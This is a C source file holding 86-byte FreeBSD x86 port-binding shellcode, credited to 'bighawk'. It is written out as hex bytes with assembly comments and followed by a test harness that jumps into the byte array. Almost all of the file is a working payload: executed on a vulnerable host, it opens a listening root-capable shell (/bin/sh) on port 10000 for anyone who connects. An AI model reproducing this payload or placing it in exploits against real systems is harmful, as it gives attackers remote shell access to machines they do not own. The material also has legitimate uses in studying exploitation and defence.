/* 86 bytes portbinding shellcode - FreeBSD-x86
 * - by bighawk (bighawk@warfare.com)
 *
 * This shellcode binds a shell on port 10000
 * Tested on: FreeBSD-4.3, OpenBSD-2.9, NetBSD-1.5
 *
 */

char code[] =

   "\x31\xc9"			// xor    ecx, ecx
   "\xf7\xe1"           	// mul    ecx
   "\x51"			// push   ecx
   "\x41"			// inc    ecx
   "\x51"			// push   ecx
   "\x41"			// inc    ecx
   "\x51"			// push   ecx
   "\x51"			// push   ecx
   "\xb0\x61"			// mov    al, 97
   "\xcd\x80"			// int	  80h
   "\x89\xc3"			// mov    ebx, eax
   "\x52"			// push   edx
   "\x66\x68\x27\x10"   	// push   word 4135
   "\x66\x51"			// push   cx
   "\x89\xe6"			// mov    esi, esp
   "\xb1\x10"			// mov    cl, 16
   "\x51"			// push   ecx
   "\x56"			// push   esi
   "\x50"			// push   eax
   "\x50"			// push   eax
   "\xb0\x68"			// mov    al, 104
   "\xcd\x80"			// int    80h
   "\x51"			// push   ecx
   "\x53"			// push   ebx
   "\x53"			// push   ebx
   "\xb0\x6a"			// mov	  al, 106
   "\xcd\x80"			// int    80h
   "\x52"			// push   edx
   "\x52"			// push   edx
   "\x53"			// push   ebx
   "\x53"			// push   ebx
   "\xb0\x1e"			// mov    al, 30
   "\xcd\x80"			// int    80h
   "\xb1\x03"			// mov    cl, 3
   "\x89\xc3"			// mov    ebx, eax
   "\xb0\x5a"			// mov	  al, 90
   "\x49"			// dec    ecx
   "\x51"			// push   ecx
   "\x53"			// push   ebx
   "\x53"			// push   ebx
   "\xcd\x80"			// int    80h
   "\x41"			// inc    ecx
   "\xe2\xf5"			// loop   -10
   "\x51"			// push   ecx
   "\x68\x2f\x2f\x73\x68"	// push    dword 68732f2fh
   "\x68\x2f\x62\x69\x6e"	// push	   dword 6e69622fh
   "\x89\xe3"			// mov	   ebx, esp
   "\x51"               	// push   ecx
   "\x54"               	// push   esp
   "\x53"               	// push   ebx
   "\x53"               	// push   ebx
   "\xb0\x3b"           	// mov    al, 59
   "\xcd\x80";			// int	   80h


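/*
 * Test harness: prints the payload length, then transfers control into
 * the code[] byte array.
 *
 * code[] is an ordinary initialised, writable data object.  On a system
 * that enforces non-executable data pages (NX / W^X) the call below faults
 * instead of running the bytes, so the harness only works where data
 * memory is executable.
 *
 * The file has no #include lines, so printf and strlen are used without
 * prototypes; <stdio.h> and <string.h> are needed for a clean build.
 */
int main(void) {
  /* Object-to-function pointer conversion: a compiler extension, not ISO C. */
  void (*a)(void) = (void (*)(void))code;

  /* strlen returns size_t, so the matching conversion is %zu, not %d. */
  printf("size: %zu bytes\n", strlen(code));

  a();
  return 0;
}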
